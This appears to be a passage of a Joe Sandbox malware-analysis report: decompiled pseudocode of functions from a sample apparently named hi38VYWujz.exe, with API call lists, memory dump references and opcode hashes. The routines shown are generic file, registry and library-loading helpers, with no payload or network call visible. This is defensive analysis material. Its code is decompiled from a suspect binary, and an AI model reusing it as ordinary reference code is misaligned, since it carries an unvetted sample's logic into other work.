0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00406639 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406639(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065C9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406641
0x00406644
0x0040664b
0x00406653
0x0040665f
0x00000000
0x00406666
0x00406656
0x0040665d
0x00000000
0x0040666e
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
GetProcAddress.KERNEL32(00000000,?), ref: 00406666

Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
Part of subcall function 004065C9: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040662F

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D51 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D51(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d55
0x00405d62
0x00405d77
0x00405d7d

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D2C(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d31
0x00405d37
0x00405d3c
0x00405d45
0x00405d45
0x00405d4e

APIs

GetFileAttributesW.KERNELBASE(?,?,00405931,?,?,00000000,00405B07,?,?,?,?), ref: 00405D31
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D45

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 706934cb3b0fb70b74806e5ec6ddb1c8dfd6769152cd575e6ec3c276ff28a2a3
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 85D01272504420AFD6512738EF0C89BBF95DB543717028B36FAE9A22F0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040580F Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040580F(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405815
0x0040581d
0x00000000
0x00405823
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C,?,00000006,00000008,0000000A), ref: 00405815
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405823

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C37(0xffffffd0);
				_t16 = E00402C37(0xffffffdf);
				E00402C37(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E004065A2(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00406025(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x00402885
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x00402245
0x00402245
0x00402245
0x00402ac2
0x00402ace

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 40b198138207619067f93710a4144b0ab42955a9d792b68c103873f962a5e6e3
Instruction ID: 04fee3d4d7e5b74fc81c5da63ec9780f5c3edfef74eedbdec85e791af98b68b0
Opcode Fuzzy Hash: 40b198138207619067f93710a4144b0ab42955a9d792b68c103873f962a5e6e3
Instruction Fuzzy Hash: 5CF0B431608114A7DB20B7B64F0DE5F61649F96368F24073FF012F21D1EABC8911956F

Uniqueness

Uniqueness Score: -1.00%

Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E004027E9(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C15(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x4c)) = _t15;
					_t10 = SetFilePointer(E004061BF(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E004061A6();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027e9
0x004027e9
0x004027ea
0x004027f2
0x004027f7
0x004027f8
0x00402807
0x00402810
0x00402a61
0x00402a62
0x00402a65
0x00402a65
0x00402810
0x00402ac2
0x00402ace

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
Instruction ID: 21d8c208f5d5b54c8d66c8a0ecd09dde93b5cc4591d01b86724f3e283dce4822
Opcode Fuzzy Hash: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
Instruction Fuzzy Hash: B0E06D72A00104AEDB11EBA5AE498AE7779EB80304B18803BF101F51D2CA790D128A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004060FA Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060FA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406051(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x00406104
0x0040610d
0x00406123
0x00000000
0x00406123
0x00406111
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406123

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: 1ce12e5a620d0377d06846f84a02a75369475120c61fa63bf0211ee428df1362
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 67E0E6B2010109BEDF099F50DD0AD7B371DE704704F01492EFA06D4051E6B5E9706B74

Uniqueness

Uniqueness Score: -1.00%

Function 00405E03 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E03(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e07
0x00405e17
0x00405e1f
0x00000000
0x00405e26
0x00000000
0x00405e28

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405DD4 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DD4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405dd8
0x00405de8
0x00405df0
0x00000000
0x00405df7
0x00000000
0x00405df9

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
